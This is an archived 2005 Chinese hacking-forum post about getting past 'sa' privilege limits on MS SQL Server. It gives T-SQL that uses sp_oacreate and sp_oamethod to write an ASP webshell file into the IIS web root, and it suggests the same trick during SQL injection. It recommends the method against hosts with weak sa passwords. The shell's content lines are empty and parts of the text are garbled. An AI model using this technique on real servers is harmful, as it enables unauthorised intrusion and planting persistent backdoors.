邪恶八进制信息安全团队技术讨论组 » 网络攻防技术{ Hacking and Defence } » 脚本安全[ Web Application ] » [转载]sa权限突破 [查看完整版本]

冰血封情 2005-1-10 06:39

[转载]sa权限突破

本文作者：简单del记忆
信息来源：Hoky Security Team [特络纳]

不知道大家看没看过LCX的那篇（对SA权限的再突破） 我认为那真的是太经典了~ 但是发现没有，他写入的WEBSHELL是CMD。ASP 这个东西不怎么用的着， 最好就是有个个人版的SHELL， 于是我把其中的代码改了，。。。 如下： SQL查询分析器连接过去declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate 'scripting.filesystem**', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\\inetpub\\wwwroot\\lcx.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, '' exec @ret = sp_oamethod @f, 'writeline', NULL, ''

后来自己研究发现。。对一些没权限的主机。在SQL注入的时候，也可以用declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate 'scripting.filesystem**', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'C:\\inetpub\\wwwroot\\lcx.asp', 1 这样的格式来写入得到SHELL， xiaolu大哥的最小的SHELL写入文件的时候都差不嗍钦飧鲈砝吹? 大家灵活运用才对，这招对于得到SA弱口令的时候特别管用

ps： 有点乱。不过挺不错的。大家慢慢看！

查看完整版本: [转载]sa权限突破

© 1999-2008 EvilOctal Security Team